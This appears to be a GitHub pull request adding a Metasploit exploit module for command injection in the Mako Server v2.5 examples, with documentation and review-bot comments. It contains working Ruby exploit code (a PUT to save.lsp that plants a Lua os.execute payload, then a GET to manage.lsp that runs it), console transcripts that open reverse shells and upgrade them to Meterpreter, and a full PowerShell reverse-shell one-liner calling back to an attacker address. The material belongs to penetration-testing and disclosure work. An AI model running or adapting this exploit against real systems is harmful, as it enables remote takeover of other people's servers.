Land #9133, Command injection in Mako Server examples
Showing 2 changed files with 288 additions and 0 deletions.

163 additions & 0 deletions:
documentation/modules/exploit/windows/http/makoserver_cmd_exec.md
@@ -0,0 +1,163 @@ | ||
## Description | ||
|
||
This module exploits a vulnerability found in Mako Server v2.5. | ||
It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp. | ||
|
||
Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391 | ||
|
||
## Vulnerable Application | ||
|
||
[Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications. | ||
|
||
This module has been verified against the following Mako Server versions for Windows XP SP3 and Windows 7 SP1 (x86/x64): | ||
- v2.5 | ||
|
||
Links: | ||
- [Windows installer](https://makoserver.net/download/mako.windows.x86.exe) | ||
- [Windows download page](https://makoserver.net/download/windows) | ||
- [Documentation](https://makoserver.net/documentation/manual/) | ||
|
||
## References for vulnerability | ||
- https://blogs.securiteam.com/index.php/archives/3391 | ||
- https://www.exploit-db.com/exploits/42683 | ||
|
||
## Verification Steps | ||
|
||
1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work) | ||
2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop | ||
3. Start msfconsole on host | ||
4. Do: ```use exploit/windows/http/makoserver_cmd_exec``` | ||
5. Do: ```set RHOST <IP address of target system>``` | ||
6. Do: ```set PAYLOAD cmd/windows/reverse_powershell``` | ||
7. Do: ```set LHOST <IP address of host system>``` | ||
8. Do: ```exploit``` | ||
9. You should get a Windows command shell | ||
|
||
## Example Output | ||
``` | ||
msf > use exploit/windows/http/makoserver_cmd_exec | ||
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 | ||
RHOST => 10.10.10.3 | ||
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell | ||
PAYLOAD => cmd/windows/reverse_powershell | ||
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 | ||
LHOST => 10.10.10.2 | ||
msf exploit(makoserver_cmd_exec) > exploit | ||
[*] Started reverse TCP handler on 10.10.10.2:4444 | ||
[*] Sending payload to target... | ||
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400 | ||
Microsoft Windows | ||
Copyright (c) 2009 Microsoft Corporation. All rights reserved. | ||
C:\Users\Smith\Downloads\MakoServer> | ||
``` | ||
|
||
## Example Verbose Output | ||
``` | ||
msf > use exploit/windows/http/makoserver_cmd_exec | ||
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 | ||
RHOST => 10.10.10.3 | ||
msf exploit(makoserver_cmd_exec) > set VERBOSE true | ||
VERBOSE => true | ||
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell | ||
PAYLOAD => cmd/windows/reverse_powershell | ||
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 | ||
LHOST => 10.10.10.2 | ||
msf exploit(makoserver_cmd_exec) > check | ||
[*] Trying to detect running Mako Server and necessary files... | ||
[*] Mako Server save.lsp returns correct ouput. | ||
[*] 10.10.10.3:80 The target appears to be vulnerable. | ||
msf exploit(makoserver_cmd_exec) > exploit | ||
[*] Started reverse TCP handler on 10.10.10.2:4444 | ||
[*] Sending payload to target... | ||
[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]]) | ||
[*] Sending PUT request to save.lsp... | ||
[*] Sending GET request to manage.lsp... | ||
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400 | ||
Microsoft Windows | ||
Copyright (c) 2009 Microsoft Corporation. All rights reserved. | ||
C:\Users\Smith\Downloads\MakoServer> | ||
``` | ||
|
||
## Scenarios | ||
|
||
### Targeting Windows 7 SP1 x64 running Mako Server v2.5 | ||
|
||
A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session: | ||
|
||
``` | ||
msf > use exploit/windows/http/makoserver_cmd_exec | ||
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2 | ||
RHOST => 10.10.10.2 | ||
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell | ||
PAYLOAD => cmd/windows/reverse_powershell | ||
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4 | ||
LHOST => 10.10.10.4 | ||
msf exploit(makoserver_cmd_exec) > check | ||
[*] 10.10.10.2:80 The target appears to be vulnerable. | ||
msf exploit(makoserver_cmd_exec) > exploit | ||
[*] Started reverse TCP handler on 10.10.10.4:4444 | ||
[*] Sending payload to target... | ||
[*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:49189) at 2017-10-25 20:57:56 -0400 | ||
Microsoft Windows | ||
Copyright (c) Microsoft Corporation. All rights reserved. | ||
C:\Users\Smith\Downloads\MakoServer>^Z | ||
Background session 1? [y/N] y | ||
msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter | ||
msf post(shell_to_meterpreter) > sessions -l | ||
Active sessions | ||
=============== | ||
Id Name Type Information Connection | ||
-- ---- ---- ----------- ---------- | ||
1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) | ||
msf post(shell_to_meterpreter) > set SESSION 1 | ||
SESSION => 1 | ||
msf post(shell_to_meterpreter) > set LPORT 8080 | ||
LPORT => 8080 | ||
msf post(shell_to_meterpreter) > exploit | ||
[*] Upgrading session ID: 1 | ||
[*] Starting exploit/multi/handler | ||
[*] Started reverse TCP handler on 10.10.10.4:8080 | ||
[-] Powershell is not installed on the target. | ||
[*] Command stager progress: 1.66% (1699/102108 bytes) | ||
... | ||
[*] Command stager progress: 100.00% (102108/102108 bytes) | ||
[*] Post module execution completed | ||
msf post(shell_to_meterpreter) > sessions -l | ||
Active sessions | ||
=============== | ||
Id Name Type Information Connection | ||
-- ---- ---- ----------- ---------- | ||
1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) | ||
2 meterpreter x86/windows smith-PC\smith @ SMITH-PC 10.10.10.4:8080 -> 10.10.10.2:49190 (10.10.10.2) | ||
msf post(shell_to_meterpreter) > sessions -i 2 | ||
[*] Starting interaction with 2... | ||
meterpreter > getuid | ||
Server username: smith-PC\smith | ||
meterpreter > sysinfo | ||
Computer : SMITH-PC | ||
OS : Windows 7 (Build 7601, Service Pack 1). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 2 | ||
Meterpreter : x86/windows | ||
``` |
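Review bot: the Description should state the precondition that the tutorial/examples application must be running (step 2 of the Verification Steps starts the "Mako-Demo" shortcut, and the module requests examples/save.lsp and examples/manage.lsp), otherwise `check` and `exploit` fail on a plain Mako Server install. Also fix "victims machine" to "victim's machine" in the Description, and note that "returns correct ouput" in the Example Verbose Output mirrors a typo in the module's own status string, so both should be corrected together. In the Scenarios transcript the line `[-] Powershell is not installed on the target.` appears right after a `cmd/windows/reverse_powershell` session was obtained and the upgrade then proceeds via the command stager; a sentence explaining this fallback would spare readers the confusion.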
@@ -0,0 +1,125 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = GoodRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Mako Server v2.5 OS Command Injection RCE', | ||
'Description' => %q{ | ||
This module exploits a vulnerability found in Mako Server v2.5. | ||
It's possible to inject arbitrary OS commands in the Mako Server | ||
tutorial page through a PUT request to save.lsp. | ||
Attacker input will be saved on the victims machine and can | ||
be executed by sending a GET request to manage.lsp. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC | ||
'Steven Patterson (Shogun Lab) <steven[at]shogunlab.com>' # Metasploit module | ||
], | ||
'References' => | ||
[ | ||
['EDB', '42683'], | ||
['URL', 'https://blogs.securiteam.com/index.php/archives/3391'] | ||
], | ||
'Arch' => ARCH_CMD, | ||
'Platform' => 'win', | ||
'Targets' => | ||
[ | ||
['Mako Server v2.5 - Windows x86/x64', { }] | ||
], | ||
'DefaultTarget' => 0, | ||
'Privileged' => false, | ||
'DisclosureDate' => 'Sep 3 2017')) | ||
|
||
register_options( | ||
[ | ||
OptString.new('URI', [true, 'URI path to the Mako Server app', '/']) | ||
] | ||
) | ||
end | ||
|
||
def check | ||
vprint_status('Trying to detect running Mako Server and necessary files...') | ||
|
||
# Send GET request to determine existence of save.lsp page | ||
res = send_request_cgi({ | ||
'method' => 'GET', | ||
'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp') | ||
}, 20) | ||
|
||
# If response does not include "MakoServer.net", target is not viable. | ||
if res.headers['Server'] !~ /MakoServer.net/ | ||
vprint_warning('Target is not a Mako Server.') | ||
return CheckCode::Safe | ||
end | ||
|
||
if res.body | ||
if res.body =~ /Incorrect usage/ | ||
# We are able to determine that the server has a save.lsp page and | ||
# returns the correct output. | ||
vprint_status('Mako Server save.lsp returns correct ouput.') | ||
return CheckCode::Appears | ||
else | ||
# The page exists, but is not returning the expected output. | ||
# May be a different version? | ||
vprint_warning('Mako Server save.lsp did not return expected output.') | ||
return CheckCode::Detected | ||
end | ||
else | ||
# The above checks failed and exploitability could not be determined. | ||
vprint_error('Unable to determine exploitability, save.lsp not found.') | ||
return CheckCode::Unknown | ||
end | ||
|
||
return CheckCode::Safe | ||
end | ||
|
||
def exploit | ||
print_status('Sending payload to target...') | ||
|
||
# The double square brackets helps to ensure single/double quotes | ||
# in cmd payload do not interfere with syntax of os.execute Lua function. | ||
cmd = %{os.execute([[#{payload.encoded}]])} | ||
|
||
# If users want to troubleshoot their cmd payloads, they can see the | ||
# Lua function with params that the module uses in a more verbose mode. | ||
vprint_status("Now executing the following command: #{cmd}") | ||
|
||
# Send a PUT request to save.lsp with command payload | ||
begin | ||
vprint_status('Sending PUT request to save.lsp...') | ||
send_request_cgi({ | ||
'method' => 'PUT', | ||
'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'), | ||
'ctype' => 'text/plain', | ||
'data' => cmd, | ||
'http' => { | ||
'X-Requested-With' => 'XMLHttpRequest', | ||
'Referer' => 'http://localhost/Lua-Types.lsp' | ||
} | ||
}, 20) | ||
rescue StandardError => e | ||
fail_with(Failure::NoAccess, "Error: #{e}") | ||
end | ||
|
||
# Send a GET request to manage.lsp with execute set to true | ||
begin | ||
vprint_status('Sending GET request to manage.lsp...') | ||
send_request_cgi({ | ||
'method' => 'GET', | ||
'uri' => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua') | ||
}, 20) | ||
rescue StandardError => e | ||
fail_with(Failure::NoAccess, "Error: #{e}") | ||
end | ||
end | ||
end |
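Review bot: `check` dereferences `res.headers` without first testing `res` for nil, so a timeout or connection refusal (where `send_request_cgi` returns nil) raises NoMethodError instead of returning `CheckCode::Unknown`; add `return CheckCode::Unknown unless res` before the Server-header test. Related points in the same hunk: the final `return CheckCode::Safe` after the if/else chain is unreachable and can be dropped; the regex `/MakoServer.net/` should escape the dot; and "correct ouput" in the vprint_status string is a typo. In `exploit`, the responses of both the PUT and the GET are discarded, so a 404 on save.lsp or manage.lsp is reported as success; check `res && res.code == 200` and `fail_with` otherwise, and map network errors to `Failure::Unreachable` rather than `Failure::NoAccess`. The Lua long-bracket wrapper `[[...]]` breaks if the encoded payload ever contains `]]`; a leveled bracket such as `[=[...]=]` (or a check that the payload contains no closing bracket) would make this robust. Finally, passing the query string inside `'uri'` bypasses URI normalization; the idiomatic form is `'vars_get' => { 'ex' => '2.1' }` (and `'execute' => 'true', 'type' => 'lua'` for manage.lsp).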